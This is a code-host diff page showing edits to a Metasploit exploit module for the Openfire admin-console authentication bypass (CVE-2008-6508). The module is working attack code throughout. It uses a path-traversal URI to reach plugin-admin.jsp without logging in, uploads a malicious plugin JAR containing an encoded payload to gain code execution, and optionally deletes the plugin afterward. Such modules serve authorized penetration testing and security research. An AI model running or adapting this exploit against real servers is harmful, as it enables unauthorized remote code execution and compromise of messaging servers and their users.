changes on openfire_auth_bypass
parent
6ec990ed85
commit
245205c6c9
Binary file not shown.
|
@ -16,29 +16,27 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits an authentication bypass vulnerability in the administration
|
||||
console of Openfire servers. By using this vulnerability it is possible to
|
||||
upload/execute a malicious Openfire plugin on the server.
|
||||
|
||||
Because of the file/format restrictions for Openfire plugins, it is not possible to deploy
|
||||
a Java payload, instead the native payload is stored in the changelog.html which will be
|
||||
renamed/executed by the plugin.
|
||||
upload/execute a malicious Openfire plugin on the server and execute arbitrary Java
|
||||
code. This module has been tested against Openfire 3.6.0a.
|
||||
|
||||
It is possible to remove the uploaded plugin after execution, however this might turn
|
||||
the server in some kind of unstable state, making re-exploitation difficult. You might want to
|
||||
do this manually.
|
||||
|
||||
This module was tested against Openfire 3.6.0a.
|
||||
the server in some kind of unstable state, making re-exploitation difficult. You might
|
||||
want to do this manually.
|
||||
},
|
||||
'Author' => [ 'Andreas Kurtz', # Vulnerability discovery
|
||||
'Author' =>
|
||||
[
|
||||
'Andreas Kurtz', # Vulnerability discovery
|
||||
'h0ng10', # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Version' => '$Revision: 14774 $',
|
||||
'Version' => '$Revision: $',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '49663' ],
|
||||
[ 'CVE', '2008-6508' ],
|
||||
[ 'OSVDB', '49663' ],
|
||||
[ 'BID', '32189' ],
|
||||
[ 'URL', 'http://community.igniterealtime.org/thread/35874' ],
|
||||
[ 'EDB', '7075' ],
|
||||
[ 'URL', 'http://community.igniterealtime.org/thread/35874' ]
|
||||
],
|
||||
'DisclosureDate' => 'Nov 10 2008',
|
||||
'Privileged' => true,
|
||||
|
@ -55,11 +53,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'java'
|
||||
}
|
||||
],
|
||||
|
||||
#
|
||||
# Platform specific targets
|
||||
#
|
||||
|
||||
[ 'Windows x86 (Native Payload)',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
|
@ -80,18 +76,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
register_options(
|
||||
[
|
||||
Opt::RPORT(9090),
|
||||
OptString.new('PATH', [ false, 'Path to the Openfire admin frontend', '/' ]),
|
||||
OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)', nil ]),
|
||||
OptString.new('PLUGINAUTHOR',[ false, 'Openfire plugin author, (default: random)', nil ]),
|
||||
OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)', nil ]),
|
||||
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
|
||||
OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)' ]),
|
||||
OptString.new('PLUGINAUTHOR',[ false, 'Openfire plugin author, (default: random)' ]),
|
||||
OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)' ]),
|
||||
OptBool.new('REMOVE_PLUGIN', [ false, 'Try to remove the plugin after installation', false ]),
|
||||
], self.class)
|
||||
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
path = datastore['PATH'] + 'login.jsp'
|
||||
base = target_uri.path
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
|
||||
path = "#{base}login.jsp"
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => path
|
||||
|
@ -112,10 +109,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Detected version: #{$1}.#{$2}.#{$3}")
|
||||
version = "#{$1}#{$2}#{$3}".to_i
|
||||
|
||||
return Exploit::CheckCode::Save if version > 360
|
||||
return Exploit::CheckCode::Safe if version > 360
|
||||
|
||||
# Just to be sure, try to access the log page
|
||||
path = datastore['PATH'] + 'setup/setup-/../../log.jsp'
|
||||
path = "#{base}setup/setup-/../../log.jsp"
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => path
|
||||
|
@ -123,13 +120,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
if (not res) or (res.code != 200)
|
||||
print_error("Failed: Error requesting #{path}")
|
||||
return nil
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
|
||||
def get_plugin_jar(plugin_name)
|
||||
files = [
|
||||
[ "logo_large.gif" ],
|
||||
|
@ -155,8 +151,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
jar
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
base = target_uri.path
|
||||
base << '/' if base[-1, 1] != '/'
|
||||
|
||||
plugin_name = datastore['PLUGINNAME'] || rand_text_alphanumeric(8+rand(8))
|
||||
plugin = get_plugin_jar(plugin_name)
|
||||
|
||||
|
@ -165,12 +163,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
return if ((p = exploit_regenerate_payload(plat, arch)) == nil)
|
||||
|
||||
|
||||
#plugin.add_file("readme.html", exe)
|
||||
plugin.add_file("lib/#{rand_text_alphanumeric(8)}.jar", payload.encoded_jar.pack)
|
||||
plugin.build_manifest
|
||||
|
||||
|
||||
# Upload the plugin to the server
|
||||
print_status("Uploading plugin #{plugin_name} to the server")
|
||||
boundary = rand_text_alphanumeric(6)
|
||||
|
@ -181,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
data << "\r\n--#{boundary}--"
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore['PATH'] + 'setup/setup-/../../plugin-admin.jsp?uploadplugin',
|
||||
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?uploadplugin",
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>
|
||||
|
@ -195,24 +190,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
print_error("Warning: got no response from the upload, continuing...") if !res
|
||||
|
||||
# Sometimes the server needs some time to deploy the plugin, so we wait...
|
||||
1.upto(120) do
|
||||
break if session_created?
|
||||
select(nil, nil, nil, 0.25)
|
||||
end
|
||||
|
||||
# Delete the uploaded JAR file
|
||||
if datastore['REMOVE_PLUGIN'] then
|
||||
print_status("Try to remove plugin #{plugin_name} from the server")
|
||||
print_status("Deleting plugin #{plugin_name} from the server")
|
||||
res = send_request_cgi({
|
||||
'uri' => datastore['PATH'] + "setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}",
|
||||
'uri' => "#{base}setup/setup-/../../plugin-admin.jsp?deleteplugin=#{plugin_name.downcase}",
|
||||
'headers' =>
|
||||
{
|
||||
'Cookie' => "JSESSIONID=#{rand_text_numeric(13)}",
|
||||
}
|
||||
}, 3)
|
||||
})
|
||||
if not res
|
||||
print_error("Error deleting the plugin #{plugin_name}. You might want to do this manually.")
|
||||
end
|
||||
end
|
||||
|
||||
handler
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue